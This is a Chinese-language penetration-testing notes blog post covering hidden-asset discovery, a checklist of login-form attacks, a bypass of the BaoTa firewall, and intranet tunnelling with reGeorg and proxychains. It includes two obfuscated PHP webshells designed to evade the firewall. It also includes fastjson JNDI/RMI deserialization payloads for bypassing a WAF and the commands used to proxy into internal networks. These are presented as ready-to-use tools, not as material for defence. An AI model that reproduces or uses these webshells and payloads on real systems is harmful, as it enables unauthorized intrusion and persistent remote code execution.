梦游般的实战笔记-更新ing

admin 2021年8月24日21:35:56评论126 views字数 2017阅读6分43秒阅读模式

前言

最近捡起了鸽了很久的repository,毕竟暑假开始了,是时候开始慢慢填坑了:

梦游般的实战笔记-更新ing

虽然建repo的目的主要是为了做笔记、备忘,但同时也希望能有更多人看到,可以从中或多或少的得到点帮助。

# 🤡https://github.com/0wlsec

目录:

梦游般的实战笔记-更新ing

关注更新请移步

https://github.com/0wlsec/pentestNote

隐藏资产探测-host碰撞

step1: 搜集子域名

step2: 搜集IP (目标域名历史解析IP)

step3: 以IP+域名的形式进行碰撞

传送:

https://github.com/fofapro/Hosts_scan https://github.com/shmilylty/OneForAll  https://fofa.so/https://site.ip138.com/https://ipchaxun.com/https://securitytrails.com/list/apex_domain/  # 子域名

参考:

https://www.cnblogs.com/Rain99-/p/13756032.htmlhttps://xz.aliyun.com/t/9590

"登录框" 攻击面

  • 用户名枚举

  • 空口令

  • 弱口令

  • 登录认证绕过

  • 暴力破解

  • 图形验证码绕过

  • 短信验证码绕过(或爆破)

  • 短信轰炸(重放)

  • 邮箱轰炸(重放)

  • 密码明文传输

  • SQL注入(万能密码)

  • 任意用户密码重置

  • 目录遍历

  • 敏感信息泄露

  • 框架漏洞(shiro)

  • XSS

宝塔防火墙 Bypass

  • 传参方式 $_COOKIE

  • 编码绕过流量检测

3重 base64 失败(似乎检测了关键字‘base64’) 

梦游般的实战笔记-更新ing

3重 url编码 成功

梦游般的实战笔记-更新ing

贴两个🐎(侵删)

demo1:

<?php$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p;?>

demo2:

<?php$poc ="axsxsxexrxt";$poc_1 = explode("x", $poc);$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST[x]))));?>


fastjson bypass 某WAF

demo

{{"@type":"java.net.URL","val":"http://.dnslog.cn"}:0

梦游般的实战笔记-更新ing

bypass

{"@type":b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}

内网渗透-代理(reGeorg+Proxifier+Win)

# reGeorghttps://github.com/sensepost/reGeorg# Proxifierhttps://pc.qq.com/detail/13/detail_10593.html


上传对应的tunnel文件,如图即可

梦游般的实战笔记-更新ing然后attack-pc 执行

python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 8888

proxifier配置代理如下

  • 127.0.0.1:8888

  • socks5

内网渗透-代理(reGeorg+proxychains+Linux)

# reGeorghttps://github.com/sensepost/reGeorg# Proxifierhttps://pc.qq.com/detail/13/detail_10593.html

上传对应的tunnel文件,如图即可

梦游般的实战笔记-更新ing

然后attack-pc 执行

python2 reGeorgSocksProxy.py -u http://192.168.10.211/tunnel.nosocket.php -p 4561

proxychains配置如下:

  • vim /etc/proxychains.conf

梦游般的实战笔记-更新ing

demo: 使用proxychains代理远程登录windows

proxychains rdesktop -g 1440x900 172.17.17.7:3389 //-g后面代表要使用的分辨率

内网渗透-代理(ssocks反向代理)

https://sourceforge.net/projects/ssocks/

参考: 

https://apt404.github.io/2016/09/12/ssocks/


持续更新ing




本文始发于微信公众号(don9sec):梦游般的实战笔记-更新ing

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月24日21:35:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   梦游般的实战笔记-更新inghttp://cn-sec.com/archives/416603.html

发表评论

匿名网友 填写信息